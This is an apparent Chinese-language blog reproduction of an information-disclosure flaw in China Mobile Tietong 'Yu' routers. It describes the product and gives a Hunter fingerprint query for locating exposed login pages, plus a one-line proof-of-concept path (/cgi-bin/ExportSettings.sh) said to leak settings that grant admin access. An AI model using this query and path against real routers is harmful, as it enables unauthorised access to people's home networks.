本文主要是介绍【漏洞复现】中移铁通禹路由器信息泄露漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Nx01 产品简介
中移禹路由器支持宽带拨号、动态IP和静态IP三种上网模式,一般中国移动宽带的光猫都是智能光猫也就是光猫带路由器功能,中移禹路由器作为二级路由使用。
Nx02 漏洞描述
中移禹路由器ExportSettings处存在信息泄露漏洞,攻击者可以获取后台权限。
Nx03 产品主页
hunter-query: title="互联世界 物联未来-登录"
Nx04 漏洞复现
POC:
/cgi-bin/ExportSettings.sh
Nx05 修复建议
建议联系软件厂商进行处理。
这篇关于【漏洞复现】中移铁通禹路由器信息泄露漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
